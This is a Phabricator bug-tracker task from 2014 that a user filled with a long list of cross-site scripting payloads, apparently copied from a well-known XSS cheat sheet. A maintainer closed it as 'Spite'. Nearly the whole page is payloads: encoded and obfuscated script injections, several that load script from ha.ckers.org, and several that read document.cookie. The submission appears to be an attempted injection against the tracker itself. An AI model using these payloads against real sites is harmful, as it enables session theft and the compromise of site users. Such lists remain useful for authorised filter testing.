Page MenuHomePhabricator
Create Task
Maniphest T4487

><img src=x onerror=prompt(1)>
Closed, SpitePublic
Actions

Description

<img src=x onerror=prompt(1)>

Event Timeline

bhati123 created this task.Mar 2 2014, 5:03 AM
bhati123 raised the priority of this task from to Needs Triage.
bhati123 updated the task description. (Show Details)
bhati123 added a subscriber: bhati123.

<img src=x onerror=prompt(1)>

123');alert(document.cookie);('

<img src=x onerror=prompt(5)>

"><img src=x onerror=prompt(1);>

'><a href='http://google.com'><font size="100" >Click Me For

Google</font></a><>

prettyPhoto/2,<a onclick="alert(/XSS Vulnerability/);">/

<iframe onmouseover=javascript:alert(1)>

String.fromCharCode(60)scriptString.fromCalert(String.fromCharCode(34)XSSString.fromCharCode(34))String.fromCharCode(60)/scriptS

;alert(String.fromCharCode(88,83,83))';alert(String.fromCharCode(88,83,83))";
alert(String.fromCharCode(88,83,83))";alert(String.fromCharCode(88,83,83))--

</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

IMG SRC=javascript:alert('XSS')>

IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

IMG SRC=javascript:alert("RSnake says, 'XSS'")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

MG SRC="jav&#x09;ascript:alert('XSS');">

IMG SRC="jav&#x0A;ascript:alert('XSS');">

IMG SRC="jav&#x0D;ascript:alert('XSS');">

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>alert("XSS");//<</SCRIPT>

SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

/TITLE><SCRIPT>alert("XSS");</SCRIPT>

INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

META HTTP-EQUIV="Link" Content="http://ha.ckers.org/xss.css; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

xp/*<A STYLE='no\xss:noxss("**");
xss:ex/*XSS**/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">

XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script%

META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

TABLE><TD BACKGROUND="javascript:alert('XSS')">

DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->

BASE HREF="javascript:alert('XSS');//">

BJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

MBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=> SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>\\

bhati123 attached 1 file(s): Restricted File.Mar 2 2014, 5:06 AM

hello

bhati123 removed a subscriber: bhati123.Mar 2 2014, 6:01 AM
chad closed this task as Spite.Mar 2 2014, 6:44 AM

spacecat

Phabricator · Built by Phacility